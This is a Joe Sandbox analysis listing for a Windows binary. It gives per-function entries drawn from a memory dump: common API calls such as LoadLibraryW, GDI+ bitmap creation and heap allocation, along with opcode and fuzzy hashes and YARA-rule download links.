Instruction ID: fd3febfc95b13dcc40f34857761b5215f4f93f007c02b74ff0479f7008a8922e
Opcode Fuzzy Hash: b243133eaf340fd6fd5fb933963b83c1643bf9464895c2cd3391f54b6d43ebf7
Instruction Fuzzy Hash: DEE09B3550012CA7CB10EB68DC09BD577ADAB093E1F014262FD48D31E1D774DD849AD4

Uniqueness

Uniqueness Score: -1.00%

Function 00720085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007200A0
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0071EB86,Crypt32.dll,00000000,0071EC0A,?,?,0071EBEC,?,?,?), ref: 007200C2

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 716f73691ec72811f55603fe5bbccd260b3cb8a11959979fa1093c4df5c0e48b
Instruction ID: 7781747041365117dd2bb5a142f9836b111a0603af8b0f62662422eacfdc62be
Opcode Fuzzy Hash: 716f73691ec72811f55603fe5bbccd260b3cb8a11959979fa1093c4df5c0e48b
Instruction Fuzzy Hash: 17E0127690112CAADB21AAA4AC09FD6776CEF1D382F0440A6B948D3155DB789A848BF4

Uniqueness

Uniqueness Score: -1.00%

Function 00729B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00729B30
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00729B37

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: f1b398fdca121244cbb9bab4698aca2b7f13d052e9507041f08f137be657652a
Instruction ID: 103b4df8e5720b7629ae7ea43c1ce98d6602877625b35db58740fc474f1bd0c6
Opcode Fuzzy Hash: f1b398fdca121244cbb9bab4698aca2b7f13d052e9507041f08f137be657652a
Instruction Fuzzy Hash: DDE0ED71901228EBCB10DF98E905799B7E8EB04321F10805BE89993600D7756E449B95

Uniqueness

Uniqueness Score: -1.00%

Function 0073215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 0073329A: try_get_function.LIBVCRUNTIME ref: 007332AF

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0073217A
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00732185

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: a72576cb1fd1e9505ce03cfdda9928ac02ab7b407cf8057f3ebdecc960a43706
Instruction ID: ec3f5dadb615e7d3eb6b251d18539023f47505fc533a56051fcb710d48b64f50
Opcode Fuzzy Hash: a72576cb1fd1e9505ce03cfdda9928ac02ab7b407cf8057f3ebdecc960a43706
Instruction Fuzzy Hash: CBD0237420430DA47C5837B82E5649913447952FB0FF04746F320C50D3EF1C44077123

Uniqueness

Uniqueness Score: -1.00%

Function 0072DC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadLock.DELAYIMP ref: 0072DC73
DloadProtectSection.DELAYIMP ref: 0072DC8F

Part of subcall function 0072DE67: DloadObtainSection.DELAYIMP ref: 0072DE77

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: Dload$Section$LockObtainProtect
String ID:
API String ID: 731663317-0
Opcode ID: fcc80f25bcad50bbfd01cff0dc21b9f7a79e6e882c949a802cbfdf66282b287d
Instruction ID: 9d2092e2c4e40669b304823a0faaeabbd3311c6a9d8d1a4d1bef5d60c85999d7
Opcode Fuzzy Hash: fcc80f25bcad50bbfd01cff0dc21b9f7a79e6e882c949a802cbfdf66282b287d
Instruction Fuzzy Hash: 43D0C974500220CED636AB64B94A7AC2271B704784F644606A109C60A5EBFC4CD0E6A9

Uniqueness

Uniqueness Score: -1.00%

Function 007112E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 007112FB
ShowWindow.USER32(00000000), ref: 00711302

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: bd7bc0d745a7af21df435b5adbbf1ddad01b1b0e196e7c5b9b14328f5e16fb23
Instruction ID: d7d35f5d3ad69dca64bad6a66932fcde12025744026ecfcd5beb0e60125f12e1
Opcode Fuzzy Hash: bd7bc0d745a7af21df435b5adbbf1ddad01b1b0e196e7c5b9b14328f5e16fb23
Instruction Fuzzy Hash: E5C01232058208BECB010BB0DC09D2FBBA8FBA4216F05C908B2B9C0061CA3CC090DB19

Uniqueness

Uniqueness Score: -1.00%

Function 007119A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007119AB

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 2cd943ac17c767d5bb54afe06f9421df40160380213c72355f0e8643053787ba
Instruction ID: 5a9be5c65d981a286042e40610feaad111e8cb43a78adedc0eea6e5cd2a742ee
Opcode Fuzzy Hash: 2cd943ac17c767d5bb54afe06f9421df40160380213c72355f0e8643053787ba
Instruction Fuzzy Hash: 50C1B474A042449FEF15CF6CC498BE97BA5AF06300F4880BADD45DF2C6DB799984CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00713B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00713B42

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 284aa8a33c86e0aaf662b2c99f48ea4961241b8df3640e117b672f494cd12660
Instruction ID: e3685317c0b75ea2b2db772dd6446f3d75ccf19ad7e6304f41559c5ae60ab8e0
Opcode Fuzzy Hash: 284aa8a33c86e0aaf662b2c99f48ea4961241b8df3640e117b672f494cd12660
Instruction Fuzzy Hash: 6C71CE71204B44AEDB21DB78DC45AE7B7E8AF14301F44496EE5EB472C2DA396A88CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0071837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00718384

Part of subcall function 00711380: __EH_prolog.LIBCMT ref: 00711385
Part of subcall function 00711380: new.LIBCMT ref: 007113FE

Part of subcall function 007119A6: __EH_prolog.LIBCMT ref: 007119AB

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 955caccfada0ecb975c7230928e0e34c901367b043abcfbd92a6928679895481
Instruction ID: 9a1d6eb4aeeaa70dce80e75e599956c19880a87b1049419825c73bb325362d25
Opcode Fuzzy Hash: 955caccfada0ecb975c7230928e0e34c901367b043abcfbd92a6928679895481
Instruction Fuzzy Hash: 2B41A5318406A4DADB20DB68CC59BEA73B8AF50300F4440EAE98A970D3DF795FC8DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00711E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00711E05

Part of subcall function 00713B3D: __EH_prolog.LIBCMT ref: 00713B42

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 43cdafc3a8edbfd7df9add8f1bd2556d3207f4c7958cba418ae25a97d56f8708
Instruction ID: a171c772cc665f5e39588b5c306fa0cb9e81d825e2ea90b4b1ff9fd79a1cd33a
Opcode Fuzzy Hash: 43cdafc3a8edbfd7df9add8f1bd2556d3207f4c7958cba418ae25a97d56f8708
Instruction Fuzzy Hash: 92215732904118DFCF21EFA8D9459EEBBF6BF58300B50006DE945AB292DB3A5E54CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0072A7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0072A7C8

Part of subcall function 00711380: __EH_prolog.LIBCMT ref: 00711385
Part of subcall function 00711380: new.LIBCMT ref: 007113FE

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 2294dc3345bb19c1536fa897d3d70dc55837c694488c02224e33501cc750f821
Instruction ID: 7c57b0d332e2ac2aad5b9d524207f2c012646d21d76ff90a4283be0aaef8856e
Opcode Fuzzy Hash: 2294dc3345bb19c1536fa897d3d70dc55837c694488c02224e33501cc750f821
Instruction Fuzzy Hash: 45216B71C04259EFCF15DF98D9569EEB7B4AF19300F4004AEE809A7242DB396E46CB61

Uniqueness

Uniqueness Score: -1.00%

Function 007192E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007192EB

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f32e36a6b6ca9192e34e1cda3454517ee0bb43bee5faaa23e106da9345c84367
Instruction ID: bb85d323b3f9abf5b4b6e7e1d852a04323c38d4418b5283334d6cd200be596e5
Opcode Fuzzy Hash: f32e36a6b6ca9192e34e1cda3454517ee0bb43bee5faaa23e106da9345c84367
Instruction Fuzzy Hash: 80118E73E40528EBCB26AEACCC559EEB736BF88750F004125F915A72D1DA388D9186A0

Uniqueness

Uniqueness Score: -1.00%

Function 0073BB8A Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 007385A9: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00738FD3,00000001,00000364,?,00733713,00000050,?,00750EE8,00000200), ref: 007385EA

_free.LIBCMT ref: 0073BBF6

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
Instruction ID: 6d397f5247e6cf56ea41c18c542b3094faaeb8b55cfd4cf73fd0b25862f9903e
Opcode Fuzzy Hash: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
Instruction Fuzzy Hash: 3001D6B2200349ABF7218F65988595AFBE9EB85370F25051DE69483281EF34A8058764

Uniqueness

Uniqueness Score: -1.00%

Function 007385A9 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00738FD3,00000001,00000364,?,00733713,00000050,?,00750EE8,00000200), ref: 007385EA

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9397eee8445a128d49a92619bd950080a0e9207b87ca1eb1420e307b4e648fb4
Instruction ID: fe6b171a5c3550f71af3704e1e1dd4b923b0a73ba734f51fb764d38256f6ec61
Opcode Fuzzy Hash: 9397eee8445a128d49a92619bd950080a0e9207b87ca1eb1420e307b4e648fb4
Instruction Fuzzy Hash: 26F05931602321EBFBB01E268C05B5B7798AF807A0F14C112F818E6083CE3CED108AE7

Uniqueness

Uniqueness Score: -1.00%

Function 00715BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00715BDC

Part of subcall function 0071B07D: __EH_prolog.LIBCMT ref: 0071B082

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: c24b618fabe7b04d0a9c5194c86a668a4af237fb3e20b5972187447db6c0897f
Instruction ID: 52de2a57075f097abf1336f7ec848130769df876529474123e5acaafc5f3e2cd
Opcode Fuzzy Hash: c24b618fabe7b04d0a9c5194c86a668a4af237fb3e20b5972187447db6c0897f
Instruction Fuzzy Hash: C1016D30A15694DACB25F7A8D05A3EDF7A49F19700F44419DE85A532C3CBB81B48C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00738518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0073C13D,00000000,?,007367E2,?,00000008,?,007389AD,?,?,?), ref: 0073854A

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: dde3ab255c62aee82c4220f1a48510bd12120caa06d664ce3a40e8d9bda08e4d
Instruction ID: 489378a1e3cb9608860a56af600f1447d35e7677acbf79524538dd36d4141b97
Opcode Fuzzy Hash: dde3ab255c62aee82c4220f1a48510bd12120caa06d664ce3a40e8d9bda08e4d
Instruction Fuzzy Hash: ACE0E5A15413259AFBB126695C04B5A378C9B813F0F244310FD19E6083CF3CCC1086EB

Uniqueness

Uniqueness Score: -1.00%

Function 007196D0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(000000FF,?,?,0071968F,?,?,?,?,00741FA1,000000FF), ref: 007196EB

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 037feb11996c2bcf965977b980a151f9220bbfae826bfe60313bc173a3878ea4
Instruction ID: 38dcde958d997fbb5f82f634d12d4dfabc9fc4c86c104dadd743f96f03f4ed3a
Opcode Fuzzy Hash: 037feb11996c2bcf965977b980a151f9220bbfae826bfe60313bc173a3878ea4
Instruction Fuzzy Hash: 70F08230556B048FDB308A28D9687D2B7E4AB12735F048B2ED1FB434E0E76969CE8F50

Uniqueness

Uniqueness Score: -1.00%

Function 0071A4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0071A4F5

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 1ccc96aa0a5e33f05138d32585fcb4f7e92393185ce90fd8854514ef612c3fa1
Instruction ID: 340454bd444cfc579872d47e5abf93663a9c83a42ca12bdd2fbef506da9318c8
Opcode Fuzzy Hash: 1ccc96aa0a5e33f05138d32585fcb4f7e92393185ce90fd8854514ef612c3fa1
Instruction Fuzzy Hash: F2F0543540A7C0FACB225B7C48087D67BA16F16361F04CA49F5FD521D2C27D54D59723

Uniqueness

Uniqueness Score: -1.00%

Function 0072067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 007206B1

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: f163849cebceb6eccc1d580ab7645f11142729c85171917388311f3e84732e7f
Instruction ID: 6dcc49f37687d8a087e71064665057b554b018b4b93a955b00256bf6f8820184
Opcode Fuzzy Hash: f163849cebceb6eccc1d580ab7645f11142729c85171917388311f3e84732e7f
Instruction Fuzzy Hash: C7D02B25200170A9C7313368B80E7FE1A0B1FC3B11F080071B40D131C3CB8E08DA42F2

Uniqueness

Uniqueness Score: -1.00%

